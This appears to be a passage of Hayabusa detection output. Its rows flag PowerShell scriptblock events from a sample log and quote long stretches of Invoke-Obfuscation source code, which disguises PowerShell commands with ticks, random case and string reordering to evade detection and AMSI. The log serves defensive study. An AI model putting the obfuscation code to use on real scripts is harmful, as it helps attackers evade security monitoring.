$ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. 
If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' 
-ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. 
New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. 
If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. 
$ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. 
$SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. 
$TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' 
-ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. 
If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. 
If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. 
$ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to 